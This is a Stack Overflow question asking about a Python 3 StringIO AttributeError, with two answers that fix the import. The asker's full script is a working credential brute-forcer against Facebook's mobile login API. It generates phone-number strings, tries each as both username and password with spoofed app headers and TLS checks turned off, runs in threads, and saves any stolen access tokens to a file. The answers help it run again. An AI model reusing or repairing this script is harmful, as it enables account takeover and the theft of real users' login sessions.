# Python 3.6 | AttributeError

Tags: python, attributes, python-3.6

> AttributeError: **type object '_io.StringIO' has no attribute
> 'StringIO'**
>
> I have an error in the following line(138):
> ***out = StringIO.StringIO()***

The code is:

```
import requests
from random import randint
import string
import random
import urllib
from io import StringIO
import gzip
import json
import time
import _thread
 
 
 
def random_machine_id():
    return ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(24))
 
 
def startbrute(number, ss):
    data = {
        'batch': '[{"method":"POST","body":"format=json&device_id=0cd272a7-17dc-4766-958e-5b48799250bf&email=2'+number+'&password='+number+'&credentials_type=password&generate_session_cookies=1&error_detail_type=button_with_disabled&machine_id='+random_machine_id()+'&locale=en_US&client_country_code=US&fb_api_req_friendly_name=authenticate","name":"authenticate","omit_response_on_success":false,"relative_url":"method/auth.login"},{"method":"POST","body":"query_id=10153437257771729&method=get&strip_nulls=true&query_params=%7B%220%22%3A75%2C%221%22%3A120%2C%222%22%3A480%7D&locale=en_US&client_country_code=US&fb_api_req_friendly_name=GetLoggedInUserQuery","name":"getLoggedInUser","depends_on":"authenticate","omit_response_on_success":false,"relative_url":"graphql?access_token={result=authenticate:$.access_token}"}]',
        'fb_api_caller_class': 'com.facebook.katana.server.handler.Fb4aAuthHandler',
        'fb_api_req_friendly_name': 'authLogin'
    }
    headers = {
        'Authorization' : 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32',
        'X-Fb-Connection-Type' : 'mobile.LTE',
        'X-Fb-Net-Hni' : '310260',
        'X-Fb-Sim-Hni' : '310260',
        'X-Fb-Net-Sid' : '',
        'X-Fb-Http-Engine' : 'Apache',
        'Content-Type' : 'application/x-www-form-urlencoded',
        'Content-Encoding' : 'gzip',
        'User-Agent' : '[FBAN/FB4A;FBAV/37.0.0.0.109;FBBV/11557663;FBDM/{density=1.5,width=480,height=854};FBLC/en_US;FBCR/Android;FBMF/unknown;FBBD/generic;FBPN/com.facebook.katana;FBDV/google_sdk;FBSV/4.4.2;FBOP/1;FBCA/armeabi-v7a:armeabi;]'
    }
    out = StringIO.StringIO()
    with gzip.GzipFile(fileobj=out, mode="w") as f:
      f.write(urllib.urlencode(data))
    r = requests.post("https://b-graph.facebook.com/?include_headers=false&locale=en_US&client_country_code=US", headers=headers, data=out.getvalue(), verify=False)
    if 'access_token' in json.loads(r.json()[0]['body']):
        f = open("accss", "a+")
        f.write(number + ":" + json.loads(r.json()[0]['body'])['access_token'] + ":" + str(json.loads(r.json()[0]['body'])['uid']) + "\n")
        f.close()
 
 
while True:
        number = "0" + str(random.randint(10,12)) + str(random.randint(10000000,99999999))
        print (number)
        _thread.start_new_thread( startbrute, (number, 4, ) )
        time.sleep(0.15)
```

1. The code was working before the update
2. I have made several repairs(except these)

Comment: Please check out [mcve]

Comment: Please don't vandalize your posts. By posting on the Stack Exchange network, you've granted a non-revocable right, under the [CC BY-SA 4.0 license](https://creativecommons.org/licenses/by-sa/4.0/), for Stack Exchange to distribute that content (i.e. regardless of your future choices). By Stack Exchange policy, the non-vandalized version of the post is the one which is distributed, and thus, any vandalism will be reverted. If you want to know more about deleting a post please see: [How does deleting work?](//meta.stackexchange.com/q/5221). You might be able to delete the post yourself as well.

Answer (score 0):

Just do

```
out = StringIO()
```

in Python 3, `StringIO` is already the class you want to instantiate, as opposed to Python 2 where it was the name of the module but also the class.

Answer (score 0):

Problem is difference between Python2 and Python3. To stay compatible with 2 and 3, try this block of code:

```
try:
    out = StringIO.StringIO()
except AttributeError:
    out = StringIO()
```